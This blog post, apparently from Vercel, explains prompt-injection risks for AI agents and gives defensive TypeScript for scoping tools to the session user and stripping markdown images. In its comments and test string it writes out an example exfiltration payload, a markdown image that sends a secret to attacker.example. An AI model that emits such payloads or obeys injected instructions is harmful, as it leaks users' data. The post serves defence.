Building secure AI agents
Blog post from Vercel
AI agents, which are language models equipped with system prompts and tools, face significant security risks, chief among them prompt injection. Like SQL injection, these attacks embed malicious instructions inside seemingly ordinary data, letting an attacker redirect the agent's behavior.

The practical defense is to assume the prompt is fully compromised: scope every tool strictly to the authority of the authenticated user, and design the system so that any input may be hostile. Injections can arrive indirectly, through database content or web-scraped pages, so they remain a threat even when every tool is properly authorized.

Model outputs carry exfiltration risk as well: rendering injected markdown, for example, can cause the browser to leak data to an attacker-controlled URL. Treat model output as untrusted by default, sanitize it before rendering, and layer on additional measures such as Content Security Policy (CSP) rules and packages built for safe markdown handling.

In short, don't trust the model to follow rules. Design for security from the outset, and build agents so that when something fails, the blast radius is as small as possible.
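One way to scope a tool to user authority is to bind it to the authenticated session at construction time, so the model never receives a user-id parameter it could abuse. This is a minimal sketch; the `Session` type, `makeListInvoicesTool` helper, and in-memory "database" are assumptions for illustration, not a real Vercel API.

```typescript
// A session established by your auth layer, outside the model's reach.
type Session = { userId: string };

// Stand-in for a real database, keyed by user id (assumption for the sketch).
const invoicesByUser: Record<string, string[]> = {
  "user-1": ["INV-001", "INV-002"],
  "user-2": ["INV-900"],
};

// The tool closes over the session's userId. The model never sees a userId
// parameter at all, so even a fully compromised prompt cannot request
// another user's data: the tool is scoped to the caller's authority.
function makeListInvoicesTool(session: Session) {
  return {
    name: "listInvoices",
    description: "List the current user's invoice ids",
    execute: (): string[] => invoicesByUser[session.userId] ?? [],
  };
}

const tool = makeListInvoicesTool({ userId: "user-1" });
console.log(tool.execute()); // only user-1's invoices, whatever the prompt says
```

The key design choice is that authorization data flows from the session into the tool's closure, never through the model's tool-call arguments.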
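To make the exfiltration risk concrete: a markdown image like `![x](https://attacker.example/log?data=SECRET)` leaks `SECRET` the moment the browser fetches it. A sketch of output sanitization, assuming a simple regex-based stripper (a real app would use a dedicated sanitizing markdown renderer; the attacker URL is illustrative):

```typescript
// Remove markdown image syntax from model output before rendering, since a
// rendered image URL triggers an automatic request the user never approves.
function stripMarkdownImages(md: string): string {
  // Replace every inline image with a placeholder; ordinary text and links
  // pass through unchanged.
  return md.replace(/!\[[^\]]*\]\([^)]*\)/g, "[image removed]");
}

const injected =
  "Here is your summary.\n\n![x](https://attacker.example/log?data=API_KEY)";
console.log(stripMarkdownImages(injected));

// Defense in depth: a CSP like this (an assumed example, adjust to your app)
// limits where images may load from even if sanitization misses a case.
const csp = "default-src 'self'; img-src 'self'";
console.log(csp);
```

Sanitization and CSP complement each other: the first keeps hostile markup out of the page, the second limits the damage if some slips through.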